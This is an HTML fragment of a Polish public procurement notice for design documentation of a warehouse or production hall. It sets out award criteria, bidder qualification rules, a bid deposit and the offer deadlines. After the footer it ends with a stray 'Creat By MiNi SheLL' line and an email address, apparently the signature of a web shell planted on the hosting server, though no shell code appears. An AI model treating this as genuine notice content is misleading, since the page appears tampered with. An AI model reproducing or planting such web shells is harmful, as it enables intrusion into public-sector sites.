Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rękojmia na przedmiot umowy na okres 36 miesięcy lub dłuższy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie niniejszego zamówienia mogą ubiegać się Wykonawcy, którzy spełniają następujące warunki udziału w postępowaniu:<br/><br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1)	zdolności do występowania w obrocie gospodarczym : Zamawiający nie stawia warunku w powyższym zakresie.<br/>2)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów : Zamawiający nie stawia warunku w powyższym zakresie.<br/>3)	sytuacji ekonomicznej lub finansowej: Zamawiający nie stawia warunku w powyższym zakresie.<br/>4)	zdolności technicznej lub zawodowej: Tak.<br/><br/>2.	Opis warunku oraz sposobu dokonywania oceny spełnienia wyżej wymienionego warunku nr 4:<br/><br/>Warunek, o którym mowa w punkcie 24.1.4), a dotyczący zdolności technicznej lub zawodowej zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał, co najmniej: 1 usługę, której przedmiotem było wykonanie dokumentacji projektowej wraz z uzyskaniem pozwolenia na budowę obejmujące halę magazynową/produkcyjną o powierzchni min 3000 m2<br/><br/>Ocena spełniania warunku zostanie dokonana wg formuły: „spełnia – nie spełnia”, na podstawie następujących oświadczeń i dokumentów złożonych przez Wykonawcę, a wskazanych i opisanych w niniejszej SWZ: <br/>	oświadczenia o spełnieniu warunków udziału w postępowaniu;<br/>	wykazu usług wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert;<br/>	dowodów dotyczących usług ujawnionych w wykazie, określających, czy usługi te zostały wykonane lub są wykonywane należycie (np. referencje/ poświadczenia lub inne dokumenty dopuszczone ustawą PZP);<br/>	pisemnego zobowiązania innego podmiotu do udostępnienia zasobów (wiedzy i doświadczenia), niezbędnych do wykonania zamówienia (o ile dotyczy), <br/><br/>4.	Zamawiający może, na każdym etapie postępowania, uznać, że wykonawca nie posiada wymaganych zdolności, jeżeli zaangażowanie zasobów technicznych lub zawodowych wykonawcy w inne przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację zamówienia. <br/>5.	W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, warunek odnoszący się do zdolności technicznej lub zawodowej lub zdolności finansowej oceniany będzie łącznie. <br/>6.	Wykonawca może w celu potwierdzenia spełniania warunków udziału w postępowaniu, w stosownych sytuacjach oraz w odniesieniu do konkretnego zamówienia, lub jego części, polegać na zdolnościach technicznych lub zawodowych lub sytuacji finansowej innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków prawnych. <br/>Zamawiający jednocześnie informuje, iż „stosowna sytuacja” o której mowa powyżej wystąpi wyłącznie w przypadku kiedy: <br/>1)	Wykonawca, który polega na zdolnościach lub sytuacji innych podmiotów udowodni Zamawiającemu, że realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, w stopniu umożliwiającym należyte wykonanie zamówienia, w szczególności przedstawiając zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia (wzór niniejszego zobowiązania stanowi złącznik nr 6 do SWZ);<br/>2)	Zamawiający oceni czy udostępniane Wykonawcy przez podmioty udostępniające zasoby zdolności techniczne lub zawodowe lub ich sytuacja finansowa lub ekonomiczna, pozwalają na wykazanie przez Wykonawcę spełniania warunków udziału w postępowaniu oraz zbada, czy nie zachodzą wobec tego podmiotu podstawy wykluczenia przewidziane względem wykonawcy. <br/>8.	Jeżeli zdolności techniczne lub zawodowe lub sytuacja finansowa lub ekonomiczna, podmiotu, o którym mowa w ust. 1, nie potwierdzają spełnienia przez Wykonawcę warunków udziału w postępowaniu lub zachodzą wobec tych podmiotów podstawy wykluczenia, Zamawiający zażąda, aby Wykonawca w terminie określonym przez zamawiającego: <br/>1)	zastąpił ten podmiot innym podmiotem lub podmiotami lub <br/>2) zobowiązał się do osobistego wykonania odpowiedniej części zamówienia, jeżeli wykaże zdolności techniczne lub zawodowe lub sytuację finansową lub ekonomiczną, zgodnie z wymaganiami opisanymi w niniejszej SWZ, w zakresie w jakim polegał na zdolnościach udostępnianych przez podmiot trzeci. <br/>9.	Z uwagi na powyższe Zamawiający wymaga, aby w załączonym do oferty zobowiązaniu Wykonawca określił:<br/>1)	zakres dostępnych wykonawcy zasobów podmiotu udostępniającego zasoby; <br/>2)	sposób i okres wykorzystania zasobów podmiotu udostępniającego zasoby, przy wykonywaniu zamówienia publicznego; <br/>3)	zakres i okres udziału podmiotu udostępniającego zasoby przy wykonywaniu zamówienia publicznego; <br/>4)	czy i w jakim zakresie podmiot udostępniający zasoby, na zdolności, którego wykonawca powołuje się w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują usługi, których wskazane zdolności dotyczą;<br/>Z treści przedstawionego zobowiązania musi wynikać jakie zasoby podmiot udostępnia i na jakich zasadach, w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia z treści zobowiązania musi wynikać deklaracja faktycznego udziału podmiotu trzeciego w realizacji zamówienia.<br/>Wykonawca, poprzez treść przedstawionych dokumentów, musi wykazać realny sposób, w jaki jest przewidziane korzystanie ze zdolności podmiotów udostępniających zasoby tzn. realny sposób w jaki ten podmiot gwarantuje Wykonawcy rzeczywisty dostęp do swoich, udostępnianych zdolności w stopniu niezbędnym dla należytego wykonania zamówienia.<br/><br/>Podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z art. 120 ustawy Pzp, odpowiada solidarnie z wykonawcą za szkodę poniesioną przez Zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nieudostępnienie zasobów nie ponosi winy.<br/><br/>Wykonawca nie może po upływie terminu składania ofert powoływać się na zdolności lub sytuację podmiotów udostępniających zasoby, jeżeli na etapie składania ofert nie polegał w danym zakresie na zdolnościach lub sytuacji podmiotów udostępniających zasoby. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawcy zobowiązani są przedłożyć wraz z ofertą:<br/>	zgodnie z art. 125 ust. 1, aktualne na dzień składania ofert, oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji, spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu, - stosowany formularz stanowi załącznik nr 2 do niniejszej SWZ, <br/>	pisemne zobowiązanie podmiotu do udostępnienia zasobów na potrzeby realizacji zamówienia, sporządzone według wzoru stanowiącego załącznik nr 6 do niniejszej SWZ, lub innego podmiotowego środka dowodowego spełniającego warunek określony w pkt 24.1.4) SWZ, jeżeli wykonawca wykazując spełnienie warunku określonego w punkcie 24.1.4) SWZ polega na zdolnościach innych podmiotów;<br/><br/>Po wezwaniu przez Zamawiającego:<br/>Oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2020r. poz. 1076 i 1086) z innym wykonawcą, który złożył odrębną ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej sporządzone według wzoru stanowiącego załącznik nr 7 do SWZ – w celu wykazania braku podstaw wykluczenia.<br/><br/>W celu potwierdzenia braku podstaw do wykluczenia na podst. art. 109 ust. 1 pkt 4, oraz, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy przedłożenia odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów; (sporządzonych nie wcześniej niż 3 miesiące przed ich złożeniem).<br/><br/>Szczegóły dotyczące wymogów odnośnie dokumentów podmiotowych , w tym dla podmiotów zagranicznych i wspólnie ubiegających się o zamówienie opisano w punktach od 23 do 26 SWZ</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">zgodnie z art. 125 ust. 1, aktualne na dzień składania ofert, oświadczenie o niepodleganiu wykluczeniu, spełnianiu warunków udziału w postępowaniu lub kryteriów selekcji, spełnianiu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu, - stosowany formularz stanowi załącznik nr 2 do niniejszej SWZ<br/><br/>wykaz usług wykonanych lub wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane wraz z załączeniem dowodów określających czy usługi te zostały wykonane lub są wykonywane należycie, sporządzony według wzoru stanowiącego załącznik nr 3 do SWZ; <br/><br/>Uwaga 1; dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane, z zastrzeżeniem, iż dla usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/><br/>Szczegóły dotyczące wymogów odnośnie dokumentów podmiotowych , w tym dla podmiotów zagranicznych i wspólnie ubiegających się o zamówienie opisano w punktach od 23 do 26 SWZ</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, zamawiający żąda od wykonawcy odpisu lub informacji z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w ust. 1, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające dostęp do tych dokumentów <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.	Zamawiający, stosownie do dyspozycji z art. 97 ustawy Pzp żąda wniesienia przez Wykonawcę wadium na zabezpieczenie oferty w wysokości: 10 000,00 zł. <br/>2.	Forma wadium.<br/>1)	Wadium może być wniesione w jednej lub kilku następujących formach:<br/>a)	pieniądzu;<br/>b)	gwarancjach bankowych;<br/>c)	gwarancjach ubezpieczeniowych;<br/>d)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tekst jednolity z dnia 25.02.2020 Dz. U. 2020, poz. 299).<br/>2)	W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja i/lub poręczenie powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać, między innymi następujące elementy:<br/>a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta / poręczyciela (instytucji udzielających gwarancji / poręczenia) oraz wskazanie ich siedzib;<br/>b)	przytoczenie nazwy niniejszego postępowania;<br/>c)	określenie wierzytelności, która ma być zabezpieczona gwarancją/ poręczeniem;<br/>d)	kwotę gwarancji/poręczenia;<br/>e)	termin ważności gwarancji/poręczenia, który nie może być krótszy niż okres związania ofertą;<br/>f)	zobowiązanie gwaranta/poręczyciela do: „nieodwołalnego i bezwarunkowego zapłacenia kwoty gwarancji/poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:<br/>(i)	Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.107 ust. 2 lub art. 128 ust. 1, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 125 ust. 1, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej lub<br/>(ii)	Wykonawca, którego ofertę wybrano <br/>-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie, lub<br/>-	nie wniósł zabezpieczenia należytego wykonania umowy, lub<br/>(iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, którego oferta została wybrana”.<br/>3)	Gwarancja/poręczenie winno być nieodwołane i bezwarunkowe, w szczególności musi jasno opisywać warunki formalne konieczne do skutecznej realizacji uprawnień Beneficjenta z tytułu gwarancji/poręczenia;<br/>4)	Gwarancja/poręczenie musi być wykonalne na terytorium Rzeczypospolitej Polskiej;<br/>3.	Miejsce i sposób wniesienia wadium.<br/>1)	Wadium wnoszone w pieniądzu należy wpłacić na następujący rachunek Zamawiającego:<br/>81 9182 0006 0005 3471 2000 0010 <br/>z dopiskiem: „Wadium – zamówienie nr ZP 2/2021 – „Opracowanie dokumentacji”. <br/><br/>2)	Wadium wnoszone w innych, dopuszczonych przez Zamawiającego formach, wykonawca przekazuje zamawiającemu oryginał gwarancji lub poręczenia w postaci elektronicznej.<br/>4.	Termin wniesienia wadium.<br/>1)	Wadium należy wnieść przed upływem terminu składania ofert pod rygorem odrzucenia oferty. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert.<br/>2)	Zaleca się dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę, ale nie jest to wystarczające do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.<br/>Pozostałe postanowienia- zgodnie z zapisami SWZ i ustawą pzp <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 3)	W celu potwierdzenia spełnienia warunków udziału w postępowaniu:<br/>wykaz usług wykonanych lub wykonywanych, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi te zostały wykonane wraz z załączeniem dowodów określających czy usługi te zostały wykonane lub są wykonywane należycie, sporządzony według wzoru stanowiącego załącznik nr 3 do SWZ; <br/><br/>Uwaga 1; dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane lub są wykonywane, z zastrzeżeniem, iż dla usług nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. <br/><br/>26.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.<br/>1.	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia (każdy z tych Wykonawców dalej zwany „Partnerem”) powinni spełniać warunki udziału w postępowaniu zgodnie z zapisami zawartymi w SWZ oraz złożyć dokumenty potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w SWZ.<br/>2.	Sytuacja ekonomiczna lub finansowa oraz zdolność techniczna lub zawodowa Partnerów będą oceniane łącznie, w tym celu dokumenty ma obowiązek złożyć ten lub ci z Wykonawców, którzy w imieniu wszystkich wykazywać będą spełnianie warunków udziału w postępowaniu w tym zakresie.<br/>3.	Ponadto Partnerzy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zaleca się, aby Pełnomocnikiem był jeden z Partnerów (Wykonawców wspólnie ubiegających się o udzielenie zamówienia). <br/>4.	Dokument ustanawiający pełnomocnictwo powinien być załączony do Oferty. Dokument pełnomocnictwa winien określać co najmniej: określenie postępowania o udzielenie zamówienia, którego dotyczy, Wymieniać Wykonawców ubiegających się wspólnie o udzielenie zamówienia, określać osobę pełnomocnika oraz zakres jego umocowania. Każdy z Partnerów musi podpisać się na dokumencie pełnomocnictwa. <br/>5.	Pełnomocnictwo powinno zostać złożone w postaci elektronicznej i opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. W przypadku gdy oryginalne pełnomocnictwo, zostały sporządzone jako dokument w postaci papierowej i opatrzone własnoręcznym podpisem, przekazuje się cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, poświadczającym zgodność cyfrowego odwzorowania z dokumentem w postaci papierowej. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej, o którym mowa w zdaniu poprzednim dokonuje mocodawca<br/>6.	Oferta winna być podpisana przez ustanowionego Pełnomocnika i będzie wiązać wszystkich Partnerów.<br/>7.	Wszelka korespondencja prowadzona będzie wyłącznie z Pełnomocnikiem. <br/>8.	Wykonawcy wspólnie ubiegający się o niniejsze zamówienie, których oferta zostanie wybrana jako najkorzystniejsza, przed podpisaniem umowy o realizację niniejszego zamówienia, zobowiązani są zawrzeć umowę regulującą współpracę tych Wykonawców i przedłożyć ją Zamawiającemu.<br/>Pozostałe wymagania - zgodnie z SWZ i ustawą pzp. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> W przypadkach określonych w paragrafie 13 wzoru umowy dopuszcza się wprowadzenie w umowie zmian obejmujących:<br/>zmianę zakresu i wartości umowy ,<br/>zmianę terminów na realizację umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-03 12:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">httpps://miniportal.uzp.gov.pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-03 14:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-01</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Zmienia się SWZ w ten sposób, że załącznik nr 6 do SWZ - Wzór pisemnego zobowiązania podmiotu do udostępnienia zasobów otrzymuje nowe brzmienie, dostępne na stronie miniportalu.<br/>(porządkuje się odesłania do innych załączników )<br/><br/>Szczegółowe postanowienia dotyczące procedury wyboru Wykonawcy, sposobu wykonania<br/>i zakresu zamówienia znajdują się w SWZ i w załącznikach do SWZ</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-26 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com